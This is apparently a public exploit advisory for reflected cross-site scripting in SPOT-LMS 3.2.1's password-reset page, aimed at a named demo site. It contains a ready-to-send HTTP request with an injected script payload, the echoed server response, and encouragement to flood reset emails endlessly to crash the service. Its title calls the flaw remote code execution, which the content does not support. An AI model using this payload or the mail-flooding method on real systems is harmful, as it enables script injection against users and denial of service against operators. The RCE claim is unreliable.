## Title: Forma SPOT-LMS-3.2.1 Cross-site scripting (reflected) RCE - reset mail vulnerability
## Author: nu11secur1ty
## Date: 11.07.2022
## Vendor: https://www.spotlms.us/index_multi.php
## The software is applied in the demo account:
https://www.spotlms-anca-001.ovh/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/spotlms.us/2022/SPOT-LMS-Latest

## Description:
The name of an arbitrarily supplied `URL` parameter from forgetpw.php
is copied into the value of an HTML tag attribute which is
encapsulated in double quotation marks.
The payload qnlxv"><script>alert('hello from
nu11secur1ty')</script>sad4r was submitted in the name of an
arbitrarily supplied URL parameter.
This input was echoed unmodified in the application's response.
The attacker can use this vulnerability to crash the cloud system by
sending an unlimited password reset request to mail in an already
created account on some domain, for example:
(www.spotlms-anca-001.ovh).

## NOTE:
For this test `google` reacted on the twentieth request =) and they
block the requests from my exploit, but after some time the attacker
can repeat and repeat these steps endlessly :)

## STATUS: HIGH Vulnerability

[+] Exploit:

```POST
GET /forgetpw.php/qnlxv"><script>function a() { document.write("<img
src='https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/XSS-image/image/kostaakatil.webp?token=GHSAT0AAAAAABTHSDC76YMVBQKZ7VLVFSBAYTHWGMQ'></img>");
}; window.onload = a; alert("A Hidden scripted image, warning you are
vulnerable!");</script>sad4r HTTP/2
Host: www.spotlms-anca-001.ovh
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63
Safari/537.36
Cache-Control: max-age=0
Cookie: PHPSESSID=7affe3c03b941d681047eea2ed6a5809;
_ga=GA1.2.688816030.1667823793; _gid=GA1.2.466977147.1667823793;
_gat=1
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 0
```
[+]Responce:

```
pagespeed.CriticalImages.Run('/mod_pagespeed_beacon','https://www.spotlms-anca-001.ovh/forgetpw.php/qnlxv%22%3E%3Cscript%3Efunction','lJlesnYP1D',true,false,'eZpCFSK_6xQ');
//]]></script><img class="img-fluid mx-auto d-block" alt="LOGO"
src="/images/logos/logo-aurorae-v0.png" width="176" height="65"
data-pagespeed-url-hash="3925108827"
onload="pagespeed.CriticalImages.checkImageForCriticality(this);"/>
                <center>
                    <p class="mt-3">A validation code will be sent to
your email to authorize the password reset operation</p>
                </center>
```


## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest)

## Proof and Exploit:
[href](https://streamable.com/y4gz1n)

## Time spent
`1:45`